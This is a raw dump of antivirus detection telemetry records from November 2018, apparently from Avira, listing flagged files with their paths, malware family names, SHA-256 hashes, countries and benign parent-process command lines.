  Row(detection=Row(filename='avscan-20181102-155845-99525dc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-155845-99525DC7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175838-2600f331', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175838-2600F331', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154019-12849f75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-154019-12849F75', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:43:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184357-f633fea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184357-F633FEA8', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184338-f2ee3ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184338-F2EE3CA8', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-002634-fdfade2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-002634-FDFADE2C', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:26:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153438-e8ec97d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-153438-E8EC97D7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173704-4904f89d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-173704-4904F89D', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153856-086d831e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-153856-086D831E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-000932-9efd66f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-000932-9EFD66F0', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182216-1802ef01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-182216-1802EF01', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183635-aaa2fc8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183635-AAA2FC8E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161643-1cb36274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-161643-1CB36274', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174337-8c075fdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-174337-8C075FDB', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175532-062240f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175532-062240F2', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180244-4ff2d094', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180244-4FF2D094', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001832-d1273a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001832-D1273A3B', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001732-cb9eb9d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001732-CB9EB9D2', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-003311-22d94e06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-003311-22D94E06', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:33:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183232-813a38ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183232-813A38FF', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184105-d8c138ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184105-D8C138EC', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183739-b5aef61a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183739-B5AEF61A', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184556-0a7cf398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184556-0A7CF398', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183742-b612c167', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183742-B612C167', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175929-2ea1f6bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175929-2EA1F6BB', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174528-9ef519c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-174528-9EF519C7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180329-57add8d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180329-57ADD8D5', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180913-924b565a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180913-924B565A', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='32[1].zip', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\WNMX7T5I\\32[1].zip', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181940-fd60a755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-181940-FD60A755', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001514-bec08ac7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001514-BEC08AC7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_15_20_2.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Photoshop 7.0\\Help\\1_15_20_2.html', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='099497c2cf174d8b393ac0cbf7dc7e154053ec1ec2dbde8a0e221aa082aed89a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bcastdvr.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\bcastdvr.exe', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='099c4543397b9997b0b96d4bbb45f187285912efa6c4698a6511b7c77e67b0b8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agendador-backup-2017_06_12_17_35_22.exe', filepath='C:\\Users\\X\\Desktop\\NextAgeERP\\Agendador-Backup-2017_06_12_17_35_22.exe', filesize=1984000, name='TR/Dropper.Gen.#M300.#R3643'), hash='09cfdeff217e6d6108b424c437e1fceeb8faaa3efca07e659c4e6e2616bbc7c6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T01:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.available\\Avira\\09D49A2BA912849E6DB2A18405121A2B7B4196FEA9CF0D1F3920CBC09B42F47E.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:14:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mitsubishilancerevovii_by_sin5k4.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\MitsubishiLancerEvoVII_by_Sin5k4\\MitsubishiLancerEvoVII_by_Sin5k4.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='09e0203f53d490660659f67271769b459ac9fcfd495094936ae7c3317026fadb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-02.04.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='09ee66de9f790357add011e76d2bebeded29b34233ad558946816266334a5cda', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-02.04.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='09ee66de9f790357add011e76d2bebeded29b34233ad558946816266334a5cda', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a4216afb205f4843648dbe8f1405c7499215919a30709c5eabba6c1beef2247', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0A4216AFB205F4843648DBE8F1405C7499215919A30709C5EABBA6C1BEEF2247', filesize=512000, name='HEUR/AGEN.1033395.#M1.#R1'), hash='0a4216afb205f4843648dbe8f1405c7499215919a30709c5eabba6c1beef2247', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:23:36Z'), dt=datetime.date(2018, 11, 2)),
